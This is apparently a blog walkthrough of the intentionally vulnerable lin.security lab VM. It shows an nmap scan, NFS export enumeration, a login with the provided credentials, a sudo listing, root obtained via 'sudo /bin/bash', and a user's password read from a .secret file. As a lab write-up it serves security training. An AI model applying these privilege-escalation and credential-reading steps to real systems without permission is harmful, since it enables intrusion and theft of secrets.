Here at in.security we wanted to develop a Linux virtual machine that is based, at the time of writing, on an up-to-date Ubuntu distro (18.04 LTS), but suffers from a number of vulnerabilities that allow a user to escalate to root on the box. This has been designed to help understand how certain built-in applications and services if misconfigured, may be abused by an attacker.
We have configured the box to simulate real-world vulnerabilities (albeit on a single host) which will help you to perfect your local privilege escalation skills, techniques and toolsets. There are a number challenges which range from fairly easy to intermediate level and we’re excited to see the methods you use to solve them!
The image is just under 1.7 GB and can be downloaded using the link above. On opening the OVA file a VM named lin.security will be imported and configured with a NAT adapter, but this can be changed to bridged via the the preferences of your preferred virtualisation platform.
To get started you can log onto the host with the credentials: bob/secret
The nmap port scan resulted in the following output:
root@kali:~# nmap -A -p 1-65535 192.168.43.150 Nmap scan report for linsecurity (192.168.43.150) Host is up (0.00020s latency). Not shown: 65528 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA) | 256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA) |_ 256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100003 3 2049/udp nfs | 100003 3,4 2049/tcp nfs | 100005 1,2,3 48327/udp mountd | 100005 1,2,3 60531/tcp mountd | 100021 1,3,4 35925/tcp nlockmgr | 100021 1,3,4 55354/udp nlockmgr | 100227 3 2049/tcp nfs_acl |_ 100227 3 2049/udp nfs_acl 2049/tcp open nfs_acl 3 (RPC #100227) 35925/tcp open nlockmgr 1-4 (RPC #100021) 50119/tcp open mountd 1-3 (RPC #100005) 52467/tcp open mountd 1-3 (RPC #100005) 60531/tcp open mountd 1-3 (RPC #100005) MAC Address: 08:00:27:A3:D2:FD (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.20 ms linsecurity (192.168.43.150)
It looks like, there’s a shared network filesystem…
root@kali:~# showmount -e 192.168.43.150 Export list for 192.168.43.150: /home/peter *
As you can see, peter’s home folder was shared, but after mounting, I couldn’t find anything interesting. The creator of the machine provided a username and a password to log in. So, let’s use it!
root@kali:~# ssh email@example.com firstname.lastname@example.org's password: Welcome to lin.security | [https://in.security](https://in.security) | version 1.0 bob@linsecurity:~$
As for enumeration, I checked bob’s privileges:
bob@linsecurity:~$ sudo -l [sudo] password for bob: Matching Defaults entries for bob on linsecurity: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User bob may run the following commands on linsecurity: (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
We have the ability run a bunch of things as root, without actually knowing the root password. Probably the most convenient solution is to run the bash program as root.
bob@linsecurity:~$ sudo /bin/bash root@linsecurity:~# whoami root
At this point the challenge was over, but I checked out susan’s home directory and found a .secret file.
root@linsecurity:/home/susan# ls -la total 32 drwxr-xr-x 4 susan susan 4096 Aug 6 21:38 . drwxr-xr-x 5 root root 4096 Jul 9 19:58 .. -rw-r--r-- 1 susan susan 220 Jul 9 19:58 .bash_logout -rw-r--r-- 1 susan susan 3771 Jul 9 19:58 .bashrc drwx------ 2 susan susan 4096 Aug 6 21:38 .cache drwx------ 3 susan susan 4096 Aug 6 21:38 .gnupg -rw-r--r-- 1 susan susan 807 Jul 9 19:58 .profile -rw-r--r-- 1 susan susan 20 Jul 9 19:57 .secret root@linsecurity:/home/susan# cat .secret MySuperS3cretValue!
It turned out, it was her SSH password…
If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!